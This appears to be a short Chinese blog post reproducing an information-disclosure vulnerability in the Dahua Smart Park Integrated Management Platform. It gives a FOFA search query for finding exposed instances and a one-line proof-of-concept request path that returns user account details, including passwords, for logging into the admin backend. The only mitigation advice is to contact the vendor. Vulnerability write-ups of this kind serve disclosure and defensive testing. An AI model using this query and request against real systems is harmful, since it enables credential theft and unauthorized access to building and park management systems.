【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
拾光拾趣录2 分钟前
OAuth 2.0:现代应用安全的授权与登录规范
前端·安全
不羁。。1 小时前
【网络协议安全】任务13:ACL访问控制列表
网络·网络协议·安全
一只小阿乐1 小时前
window 服务器上部署前端静态资源以及nginx 配置
运维·服务器·nginx
bjzhang751 小时前
docker部署tomcat网站服务器
服务器·docker·tomcat
IT成长日记1 小时前
【Docker基础】Docker网络模式:Host模式深度解析
网络·docker·容器·host·网络模式
车载测试工程师1 小时前
汽车功能安全系统阶段开发【技术安全方案TSC以及安全分析】5
功能测试·网络协议·安全·车载系统·汽车
Jay Kay1 小时前
brpc中后端server挂在同一个命名服务和不同命名服务的区别详解
运维·服务器·brpc
落笔画忧愁e8 小时前
扣子Coze飞书多维表插件添加数据记录
java·服务器·飞书
Two_brushes.11 小时前
【linux 网络】网络基础
linux·网络
Code Warrior11 小时前
【Linux】基础开发工具(3)
linux·服务器